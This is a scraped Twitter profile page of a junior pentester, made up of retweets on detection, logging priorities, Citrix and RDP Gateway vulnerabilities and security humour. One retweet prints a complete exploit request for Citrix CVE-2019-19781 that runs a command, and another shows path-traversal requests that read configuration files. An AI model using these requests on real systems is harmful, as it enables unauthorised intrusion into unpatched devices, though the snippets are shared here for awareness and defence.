Nekyz

@Nekyz_

Junior Pentester | Forensics Enthusiast | Reversing for fun | CTF ♥ Yin ♥

Vrijeme pridruživanja: ožujak 2011.

Tweetovi

Blokirali ste korisnika/cu @Nekyz_

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @Nekyz_

  1. proslijedio/la je Tweet
    2. velj

    Can your EDR detect symbolic link callback rootkits? Because ours sure as heck can't. and I wrote about these!

    Poništi
  2. proslijedio/la je Tweet
    29. sij

    "I wonder if that payload alerted anything..." -- looks through the SOC's windows "Nope. We're good..."

    Poništi
  3. proslijedio/la je Tweet
    28. sij

    What IT people think: “I need to control program updates and approve them because I’m uniquely intelligent and totally have the time to validate other people’s software.” What that looks like after 3 years:

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    27. sij

    A map of Citrix devices that are vulnerable to CVE-2019-19781

    Poništi
  5. proslijedio/la je Tweet
    26. sij

    Ladies and gentlemen, I present you a working Remote Code Execution (RCE) exploit for the Remote Desktop Gateway (CVE-2020-0609 & CVE-2020-0610). Accidentally followed a few rabbit holes but got it to work! Time to write a blog post ;) Don't forget to patch!

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    27. sij

    What issues do people have with a rollout in an enterprise? Log volume? I’ve seen orgs worried about 20GB of daily Sysmon log data, while at the same time spending a 6 figure sum on a license to process 500GB of daily firewall log data. (which is mostly useless)

    Poništi
  7. proslijedio/la je Tweet
    26. sij

    Log Sources - ordered by priority - with ratings in different categories - personal and highly subjective assessment - from my most recent slide deck on low hanging fruits in security monitoring

    Poništi
  8. proslijedio/la je Tweet
    13. sij

    For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+({'BLOCK'='print+`id`'})%]

    Poništi
  9. proslijedio/la je Tweet
    9. sij

    It never ceases to surprise me that so much of hacking can be summed up by the simple question: "You put WHAT, WHERE?"

    Poništi
  10. proslijedio/la je Tweet
    8. sij

    CVE-2019-19781 Citrix path traversal base on vpns folder Example: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf patch >> HTTP/1.1 403 Forbidden no patch >> HTTP/1.1 200 OK [global] encrypt passwords = yes name resolve order = lmhosts wins host bcast

    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    1. sij

    Happy Python 2.7 deprecation day 🎉

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    18. pro 2019.

    Incident Response Plan

    Poništi
  13. proslijedio/la je Tweet
    9. stu 2019.

    Log Sources Top 5 (ordered by cost-benefit ratio / volume > detectable threats) 1. Antivirus 2. Windows Eventlog (+Sysmon) 3. Proxy 4. Firewall 5. DNS

    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet
    6. stu 2019.

    “Siri, Ok Google, Please delete all my emails.” PacSec 2019 Church of Hacking Day 2: Bin Zhao demonstrating CommanderSong, YouTube song videos that embed hidden commands your phone voice recognition will recognize with 100% success rate that are effectively inaudible to humans

    Poništi
  15. proslijedio/la je Tweet
    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet

    *apple watch buzzes*: meeting in 10 *phone calendar pop up*: meeting in 10 *desktop calendar pop up*: meeting in 10 *slack reminder*: meeting in 10 YEAH OK I GOT IT, MEETING IN 10 11 minutes later: OH FUCK MY MEETING

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet

    Never seen this technique before.. Fake Captcha.

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    23. lis 2019.

    Amazing work by Miriam Wiesner () on creating visibility and mapping between MITRE and windows event logs allowing to create GPOs for better and more intelligent choices

    Poništi
  19. proslijedio/la je Tweet
    18. lis 2019.

    Topical, metasploit. Topical.

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·